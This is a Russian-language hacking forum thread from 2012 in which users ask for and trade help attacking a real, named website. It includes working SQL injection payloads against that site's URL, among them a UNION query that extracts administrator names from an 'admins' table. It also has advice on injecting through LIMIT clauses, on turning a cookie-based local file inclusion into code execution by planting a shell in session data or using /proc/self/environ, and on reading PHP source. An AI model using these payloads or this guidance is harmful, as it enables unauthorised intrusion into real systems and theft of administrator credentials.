 |
|
08.08.2012, 17:57
|
|
Новичок
Регистрация: 24.06.2010
Сообщений: 9
С нами:
8360246
Репутация:
0
|
|
Сообщение от OxoTnik
Ну раз ШОП, то линк в студию)) (в личку кинь посотрю)
ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15
я не волшебник. я только учусь))) испробовал море всего уязвимость 100%
а застрял то в самом начале.
у?catid=15-7 производит вычисление catid=8
?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union
вот тут собственно я заработал шизофрению!
моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.
|
|
|
08.08.2012, 18:16
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от apoclepsis
ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15
я не волшебник. я только учусь))) испробовал море всего уязвимость 100%
а застрял то в самом начале.
у?catid=15-7 производит вычисление catid=8
?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union
вот тут собственно я заработал шизофрению!
моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.
Код:
http://biz.podolsk.ru/picturebrowse.php?catid=15+and+mid(version(),1,1)=5--+-
Version: 5.1.60
|
|
|
|
09.08.2012, 06:26
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22
Вместо конструкции select+admin+from+admins можно подставить UPDATE запрос? А то что-то у меня не выходит?
|
|
|
|
09.08.2012, 07:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от cipa21
-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22
Вместо конструкции
select+admin+from+admins
можно подставить UPDATE запрос? А то что-то у меня не выходит?
нельзя
|
|
|
|
11.08.2012, 03:20
|
|
Новичок
Регистрация: 01.08.2012
Сообщений: 7
С нами:
7252886
Репутация:
0
|
|
SELECT g.id FROM categories g LEFT JOIN msk.categories l ON g.id=l.id WHERE (g.spr_sel_super>0 OR l.sel_super>0) AND g.spr_visible=1 AND l.visible=1 ORDER BY IF(g.spr_sel_super>0, g.spr_sel_super, l.sel_super) DESC, RAND() LIMIT [SQL]
Как можно заюзать?
я всю голову сломал
Обычный union не берет вроде
|
|
|
|
11.08.2012, 03:24
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
В LIMIT Sql injection не раскрутите
|
|
|
|
11.08.2012, 03:25
|
|
Новичок
Регистрация: 01.08.2012
Сообщений: 7
С нами:
7252886
Репутация:
0
|
|
Сообщение от cat1vo
В LIMIT Sql injection не раскрутите, если конечно уязвим не второй параметр.
В смысле второй?
я могу же и LIMIT 1 и LIMIT 1,1
|
|
|
|
13.08.2012, 23:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Помогите советом.
Есть LFI но в параметре кукисов.
Логи не удалось найти, но можно подключать сессию.
Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.
Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?
|
|
|
|
13.08.2012, 23:54
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Teratex
Помогите советом.
Есть LFI но в параметре кукисов.
Логи не удалось найти, но можно подключать сессию.
Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.
Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?
Для прочтение файлов php, попросту захексь их и всё. Дальше подключение найди к базе.
|
|
|
|
13.08.2012, 23:59
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Сообщение от Teratex
Логи не удалось найти
/proc/self/environ - тоже не удалось найти?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
